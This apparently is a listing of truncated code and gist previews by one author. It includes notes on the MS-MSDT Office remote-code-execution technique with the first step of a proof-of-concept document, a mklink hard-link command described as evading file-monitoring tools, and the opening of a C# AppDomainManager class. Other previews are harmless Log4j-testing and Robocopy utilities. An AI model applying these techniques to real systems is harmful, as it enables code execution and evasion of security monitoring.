Skons

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

Skons

Function Test-Log4jVulnerability {
	<#
	.SYNOPSIS
		Test jar files in a csv file created with Find-File
	.DESCRIPTION
		Test if log4j files are vulnerable for CVE-2021-44228
	.PARAMETER WorkingDirectory
		A location where temporary files will be stored
	.PARAMETER Path
		The CSV file created with Find-File	

Skons

#region support functions
Function ConvertFrom-RobocopyLog {
	<#
	.SYNOPSIS
		Convert	a Robocopy log file to a CSV
	.DESCRIPTION
		Convert	a Robocopy log file to a CSV
	.PARAMETER Delimiter
		Delimiter used within the log file	
	.PARAMETER SourceFile

Skons

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

Skons

using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;


public sealed class MyAppDomainManager : AppDomainManager
{
  
    public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    {